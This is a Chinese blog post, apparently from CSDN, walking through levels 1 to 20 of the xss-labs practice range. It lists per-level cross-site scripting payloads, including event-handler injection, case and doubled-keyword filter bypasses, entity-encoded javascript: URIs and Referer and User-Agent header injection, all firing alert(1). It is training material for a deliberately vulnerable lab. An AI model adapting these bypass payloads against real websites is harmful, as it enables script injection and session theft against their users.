xss_labs靶场_1~20关练习

在开始前,先了解一下前段小知识

javascript事件(onclick/onmouseover/onmouseout等)

楼主自己用的payload

level1 <script>alert(1)</script>
level2"><script>alert(1)</script>//
level3' onclick=alert(1)//
level4" onclick=alert(1) //
level5"> <a href=javascript:alert()>something</a>
level6"><sCRIPT>alert(1)</sCRIPT>//
level7"><scscriptript>alert(1)</scrscriptipt>
level8

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

解码结果是:javascript:alert(1)

level9

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;//http://

码结果是:javascript:alert(1)//http://

level10

在这里插入图片描述
主要是t_sort传参
所以?t_sort=" type="text" onclick=alert(1)//
?keyword=123&t_sort=" type="text" onclick=alert(1)//
都是一样的

在这里插入图片描述
level11" onclick="alert(1)" type="text"//
抓包把Referer的值改了
如果没有Referer,就自己添加上。
这次是抓包改User-Agent
在这里插入图片描述
level12" onclick="alert(1)" type="text"//
这次是抓包改User-Agent
level13
user=" onmouseover=alert() type="text"// 彳亍

user=" οnclick=“alert(1)” type=“text”// 不彳亍
在这里插入图片描述
14、15关楼主打不开,就省略把
level16?keyword=<img%0Asrc=1%0Aonerror=alert(1)>
level17?arg01=a&arg02= onmouseover=alert(1)
在这里插入图片描述
level18
漏洞描述:等同于17,arg01和arg02存在注入点,但web服务器对"进行了过滤

level19-20
漏洞描述:flash 反编译,输入的onmouseover事件会被当作普通文本

原理:xss靶场大通关(持续更新ing)

原理+payload:xss_labs 漏洞平台靶场练习 总结 wp

原理+payload2:XSS靶场练习题

  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 5
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值